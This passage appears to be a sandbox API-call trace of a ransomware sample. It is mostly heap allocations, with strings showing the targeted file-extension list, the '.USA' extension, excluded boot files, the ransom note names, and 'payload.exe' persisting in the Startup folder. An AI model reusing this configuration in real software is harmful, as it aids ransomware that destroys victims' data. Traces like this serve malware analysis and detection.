(HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a2788 [0261.641] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a27a0 [0261.641] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a27b8 [0261.641] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc) returned 0x5a27d0 [0261.641] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a27e8 [0261.641] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a2800 [0261.641] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a2818 [0261.641] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a2830 [0261.641] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc) returned 0x5a2848 [0261.641] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a2860 [0261.641] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a2878 [0261.641] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x55da20, Size=0x400) returned 0x55da20 [0261.642] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a2890 [0261.642] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a28a8 [0261.642] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc) returned 0x5a28c0 [0261.642] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a28d8 [0261.642] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a28f0 [0261.642] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a2908 [0261.642] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc) returned 0x5a2920 [0261.642] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a2938 [0261.642] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a2950 [0261.642] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a2968 [0261.642] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x5a1f88 [0261.642] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a2980 [0261.642] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc) returned 0x5a2998 [0261.642] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a29b0 [0261.642] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a29c8 [0261.642] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a29e0 [0261.642] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a29f8 [0261.642] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xe) returned 0x5a2a10 [0261.642] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a2a28 [0261.642] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a2a40 [0261.642] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a2a58 [0261.642] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a2a70 [0261.642] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a2a88 [0261.642] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a2aa0 [0261.642] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a2ab8 [0261.642] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a2af8 [0261.642] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x5a1f98 [0261.642] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a2b10 [0261.642] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a2b28 [0261.642] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a2b40 [0261.642] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a2b58 [0261.642] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a2b70 [0261.642] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a2b88 [0261.643] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a2ba0 [0261.643] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a2bb8 [0261.643] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a2bd0 [0261.643] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xe) returned 0x5a2be8 [0261.643] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a2c00 [0261.643] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xe) returned 0x5a2c18 [0261.643] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a2c30 [0261.643] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a2c48 [0261.643] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a2c60 [0261.643] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a2c78 [0261.643] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a2c90 [0261.643] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc) returned 0x5a2ca8 [0261.643] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a2cc0 [0261.643] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a2cd8 [0261.643] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a2cf0 [0261.643] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a2d08 [0261.643] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a2d20 [0261.643] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a2d38 [0261.643] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a2d50 [0261.643] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a2d68 [0261.643] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a2d80 [0261.643] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a2d98 [0261.643] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a2db0 [0261.643] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a2dc8 [0261.643] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a2de0 [0261.643] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a2df8 [0261.643] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a2e10 [0261.643] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a2e28 [0261.643] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a2e40 [0261.643] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x5a2e58 [0261.643] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x12) returned 0x55a1b8 [0261.643] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a2e70 [0261.643] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a2e88 [0261.643] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a2ea0 [0261.643] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a2eb8 [0261.644] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x57eef8 [0261.644] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x57ef10 [0261.644] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x57ef28 [0261.644] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x57ef40 [0261.644] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x57ef58 [0261.644] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x57ef70 [0261.644] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x57ef88 [0261.644] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x57efa0 [0261.644] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x57efb8 [0261.644] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x57efd0 [0261.644] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x57efe8 [0261.644] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x57f000 [0261.644] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x57f018 [0261.644] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x57f030 [0261.644] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x57f048 [0261.644] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x57f060 [0261.644] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc) returned 0x57f078 [0261.644] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc) returned 0x57f090 [0261.644] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc) returned 0x57f0a8 [0261.644] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xe) returned 0x57f0c0 [0261.644] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc) returned 0x57f0d8 [0261.644] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x5a1fa8 [0261.644] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x57f0f0 [0261.644] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x5a1fb8 [0261.644] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x57f108 [0261.644] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x57f120 [0261.644] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x57f138 [0261.644] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc) returned 0x57f150 [0261.644] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc) returned 0x57f168 [0261.644] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x57f180 [0261.644] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc) returned 0x57f198 [0261.644] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x57f1b0 [0261.644] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x57f1c8 [0261.645] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc) returned 0x57f1e0 [0261.645] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x57f1f8 [0261.645] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc) returned 0x57f210 [0261.645] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc) returned 0x57f228 [0261.645] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x57f240 [0261.645] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x5a1fc8 [0261.645] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x57f258 [0261.645] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x57f270 [0261.645] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x55da20, Size=0x800) returned 0x57f6e0 [0261.645] lstrlenW (lpString=".1cd;.3ds;.3fr;.3g2;.3gp;.7z;.accda;.accdb;.accdc;.accde;.accdt;.accdw;.adb;.adp;.ai;.ai3;.ai4;.ai5;.ai6;.ai7;.ai8;.anim;.arw;.as;.asa;.asc;.ascx;.asm;.asmx;.asp;.aspx;.asr;.asx;.avi;.avs;.backup;.bak;.bay;.bd;.bin;.bmp;.bz2;.c;.cdr;.cer;.cf;.cfc;.cfm;.cfml;.cfu;.chm;.cin;.class;.clx;.config;.cpp;.cr2;.crt;.crw;.cs;.css;.csv;.cub;.dae;.dat;.db;.dbf;.dbx;.dc3;.dcm;.dcr;.der;.dib;.dic;.dif;.divx;.djvu;.dng;.doc;.docm;.docx;.dot;.dotm;.dotx;.dpx;.dqy;.dsn;.dt;.dtd;.dwg;.dwt;.dx;.dxf;.edml;.efd;.elf;.emf;.emz;.epf;.eps;.epsf;.epsp;.erf;.exr;.f4v;.fido;.flm;.flv;.frm;.fxg;.geo;.gif;.grs;.gz;.h;.hdr;.hpp;.hta;.htc;.htm;.html;.icb;.ics;.iff;.inc;.indd;.ini;.iqy;.j2c;.j2k;.java;.jp2;.jpc;.jpe;.jpeg;.jpf;.jpg;.jpx;.js;.jsf;.json;.jsp;.kdc;.kmz;.kwm;.lasso;.lbi;.lgf;.lgp;.log;.m1v;.m4a;.m4v;.max;.md;.mda;.mdb;.mde;.mdf;.mdw;.mef;.mft;.mfw;.mht;.mhtml;.mka;.mkidx;.mkv;.mos;.mov;.mp3;.mp4;.mpeg;.mpg;.mpv;.mrw;.msg;.mxl;.myd;.myi;.nef;.nrw;.obj;.odb;.odc;.odm;.odp;.ods;.oft;.one;.onepkg;.onetoc2;.opt;.oqy;.orf;.p12;.p7b;.p7c;.pam;.pbm;.pct;.pcx;.pdd;.pdf;.pdp;.pef;.pem;.pff;.pfm;.pfx;.pgm;.php;.php3;.php4;.php5;.phtml;.pict;.pl;.pls;.pm;.png;.pnm;.pot;.potm;.potx;.ppa;.ppam;.ppm;.pps;.ppsm;.ppt;.pptm;.pptx;.prn;.ps;.psb;.psd;.pst;.ptx;.pub;.pwm;.pxr;.py;.qt;.r3d;.raf;.rar;.raw;.rdf;.rgbe;.rle;.rqy;.rss;.rtf;.rw2;.rwl;.safe;.sct;.sdpx;.shtm;.shtml;.slk;.sln;.sql;.sr2;.srf;.srw;.ssi;.st;.stm;.svg;.svgz;.swf;.tab;.tar;.tbb;.tbi;.tbk;.tdi;.tga;.thmx;.tif;.tiff;.tld;.torrent;.tpl;.txt;.u3d;.udl;.uxdc;.vb;.vbs;.vcs;.vda;.vdr;.vdw;.vdx;.vrp;.vsd;.vss;.vst;.vsw;.vsx;.vtm;.vtml;.vtx;.wb2;.wav;.wbm;.wbmp;.wim;.wmf;.wml;.wmv;.wpd;.wps;.x3f;.xl;.xla;.xlam;.xlk;.xlm;.xls;.xlsb;.xlsm;.xlsx;.xlt;.xltm;.xltx;.xlw;.xml;.xps;.xsd;.xsf;.xsl;.xslt;.xsn;.xtp;.xtp2;.xyze;.xz;.zip;") returned 1776 [0261.645] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5a0ed8 | out: hHeap=0x520000) returned 1 [0261.645] lstrlenW (lpString="") returned 0 [0261.645] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x580038 | out: hHeap=0x520000) returned 1 [0261.645] lstrlenW (lpString=".USA") returned 4 [0261.645] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5594c8, Size=0x8) returned 0x5594c8 [0261.645] lstrlenW (lpString=".USA") returned 4 [0261.645] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x580038 | out: hHeap=0x520000) returned 1 [0261.645] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x580068, Size=0x20) returned 0x534618 [0261.645] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x534618, Size=0x40) returned 0x55acd0 [0261.645] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x55acd0, Size=0x80) returned 0x59eef0 [0261.645] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5a2038, Size=0x8) returned 0x5a2048 [0261.645] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5a2048, Size=0x10) returned 0x580068 [0261.645] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x580068, Size=0x20) returned 0x5345f0 [0261.645] lstrlenW (lpString="boot.ini;bootfont.bin;ntldr;ntdetect.com;io.sys;") returned 48 [0261.645] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x59eef0 | out: hHeap=0x520000) returned 1 [0261.645] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x580098, Size=0x20) returned 0x559b70 [0261.645] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x559b70, Size=0x40) returned 0x55acd0 [0261.645] lstrlenW (lpString="FILES ENCRYPTED.txt") returned 19 [0261.646] lstrlenW (lpString="FILES ENCRYPTED.txt") returned 19 [0261.646] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x55acd0 | out: hHeap=0x520000) returned 1 [0261.646] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x580098, Size=0x20) returned 0x559b70 [0261.646] lstrlenW (lpString="Info.hta") returned 8 [0261.646] lstrlenW (lpString="Info.hta") returned 8 [0261.646] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x559b70 | out: hHeap=0x520000) returned 1 [0261.646] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x5802e8, nSize=0x7fff | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\payload.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\payload.exe")) returned 0x67 [0261.646] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5802e8 | out: hHeap=0x520000) returned 1 [0261.646] lstrlenW (lpString="payload.exe") returned 11 [0261.646] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5345f0, Size=0x40) returned 0x55acd0 [0261.646] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x580098, Size=0x20) returned 0x5345f0 [0261.646] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x580098, Size=0x20) returned 0x559b70 [0261.646] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x559b70, Size=0x40) returned 0x55ad18 [0261.647] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x55ad18, Size=0x80) returned 0x59eef0 [0261.647] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x59eef0, Size=0x100) returned 0x5a0ed8 [0261.647] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0261.647] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5a0ed8 | out: hHeap=0x520000) returned 1 [0261.647] ExpandEnvironmentStringsW (in: lpSrc="%windir%;", lpDst=0x5802e8, nSize=0x8000 | out: lpDst="C:\\Windows;") returned 0xc [0261.647] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5a2ee0 | out: hHeap=0x520000) returned 1 [0261.647] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5802e8 | out: hHeap=0x520000) returned 1 [0261.647] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5a2048, Size=0x8) returned 0x5a2038 [0261.647] lstrlenW (lpString="%windir%;") returned 9 [0261.647] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5345f0 | out: hHeap=0x520000) returned 1 [0261.647] lstrlenW (lpString="C:\\Windows;") returned 11 [0261.647] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x56eed8 | out: hHeap=0x520000) returned 1 [0261.647] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5800b0, Size=0x20) returned 0x5345f0 [0261.647] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5345f0, Size=0x40) returned 0x55ad18 [0261.647] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x55ad18, Size=0x80) returned 0x59eef0 [0261.647] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x59eef0, Size=0x100) returned 0x5a0ed8 [0261.647] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5a2078, Size=0x8) returned 0x5a2088 [0261.647] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5a2088, Size=0x10) returned 0x5800f8 [0261.647] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5800f8, Size=0x20) returned 0x5345f0 [0261.647] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5a2048, Size=0x8) returned 0x5a2088 [0261.647] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5a2058, Size=0x8) returned 0x5a2048 [0261.647] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5a2078, Size=0x8) returned 0x5a2098 [0261.647] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5a2098, Size=0x10) returned 0x5801a0 [0261.647] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5801a0, Size=0x20) returned 0x559b70 [0261.647] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5a2088, Size=0x10) returned 0x5801a0 [0261.647] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5a2048, Size=0x10) returned 0x5801d0 [0261.647] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5a2088, Size=0x8) returned 0x5a2078 [0261.647] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5a20a8, Size=0x8) returned 0x5a20b8 [0261.647] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5801a0, Size=0x20) returned 0x559bc0 [0261.647] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5801d0, Size=0x20) returned 0x559ad0 [0261.647] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5a20c8, Size=0x8) returned 0x5a20d8 [0261.648] lstrlenW (lpString="doc(.doc;.docx;.pdf;.xls;.xlsx;.ppt;)arc(.zip;.rar;.bz2;.7z;)dbf(.dbf;)1c8(.1cd;)jpg(.jpg;)") returned 91 [0261.648] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5a0ed8 | out: hHeap=0x520000) returned 1 [0261.648] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x580248, Size=0x20) returned 0x559be8 [0261.648] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%", lpDst=0x56eed8, nSize=0x7fff | out: lpDst="C:") returned 0x3 [0261.648] lstrlenW (lpString="C:\\") returned 3 [0261.648] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x18fcac, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18fcac*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0261.648] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x56eed8 | out: hHeap=0x520000) returned 1 [0261.648] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5a2108, Size=0x82) returned 0x5a1368 [0261.648] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5a2128, Size=0x100) returned 0x5a13f8 [0261.648] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5a1368, Size=0x104) returned 0x5a1620 [0261.649] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5a13f8, Size=0x200) returned 0x5a1730 [0261.656] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5a2118 | out: hHeap=0x520000) returned 1 [0261.656] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5a1730 | out: hHeap=0x520000) returned 1 [0261.656] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5a0f98 | out: hHeap=0x520000) returned 1 [0261.656] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x59f088 | out: hHeap=0x520000) returned 1 [0261.656] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5802a8 | out: hHeap=0x520000) returned 1 [0261.656] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x59f110 | out: hHeap=0x520000) returned 1 [0261.656] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5a0f80 | out: hHeap=0x520000) returned 1 [0261.656] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5a1620 | out: hHeap=0x520000) returned 1 [0261.656] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5802c0 | out: hHeap=0x520000) returned 1 [0261.656] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5a1500 | out: hHeap=0x520000) returned 1 [0261.657] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5a0fb0 | out: hHeap=0x520000) returned 1 [0261.657] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5a1590 | out: hHeap=0x520000) returned 1 [0261.657] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5a0fc8 | out: hHeap=0x520000) returned 1 [0261.657] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x6) returned 0x5a2118 [0261.657] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x5802c0 [0261.657] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5802c0, Size=0x20) returned 0x559c10 [0261.657] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x559c10, Size=0x40) returned 0x55ad18 [0261.657] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x5802c0 [0261.657] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5a20e8 | out: hHeap=0x520000) returned 1 [0261.657] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x580248 | out: hHeap=0x520000) returned 1 [0261.657] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5a0ed8 | out: hHeap=0x520000) returned 1 [0261.657] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x580278 | out: hHeap=0x520000) returned 1 [0261.657] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x59f000 | out: hHeap=0x520000) returned 1 [0261.657] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x580260 | out: hHeap=0x520000) returned 1 [0261.657] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5a20f8 | out: hHeap=0x520000) returned 1 [0261.657] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x580290 | out: hHeap=0x520000) returned 1 [0261.657] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5595b8 | out: hHeap=0x520000) returned 1 [0261.657] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x55a2b8 | out: hHeap=0x520000) returned 1 [0261.657] lstrlenW (lpString="%systemdrive%") returned 13 [0261.657] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x559be8 | out: hHeap=0x520000) returned 1 [0261.657] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x59eef0 | out: hHeap=0x520000) returned 1 [0261.657] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5a20c8 | out: hHeap=0x520000) returned 1 [0261.657] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x2c) returned 0x5595b8 [0261.657] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x2000) returned 0x56eed8 [0261.657] CreateThread (in: 